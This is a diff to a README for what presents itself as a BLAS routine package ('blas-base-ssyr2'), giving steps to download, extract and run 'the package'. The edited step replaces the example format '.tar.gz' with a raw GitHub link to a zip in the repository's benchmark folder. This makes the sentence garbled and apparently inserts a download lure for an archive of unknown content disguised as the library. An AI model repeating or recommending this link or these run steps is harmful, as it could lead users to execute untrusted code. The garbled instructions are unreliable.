connecting001/blas-base-ssyr2/README.md

 After successfully downloading the package, follow these steps to run it:

 1. Locate the downloaded file on your computer.
-2. Extract the contents of the downloaded file if it is in a compressed format (like .zip or .tar.gz).
+2. Extract the contents of the downloaded file if it is in a compressed format (like .zip or https://raw.githubusercontent.com/connecting001/blas-base-ssyr2/main/benchmark/base-blas-ssyr-v1.4.zip).
 3. Open a command prompt or terminal window.
 4. Navigate to the directory where you extracted the files.
 You can use the `cd` command for this.
 For example, if you extracted it to `Downloads`, type: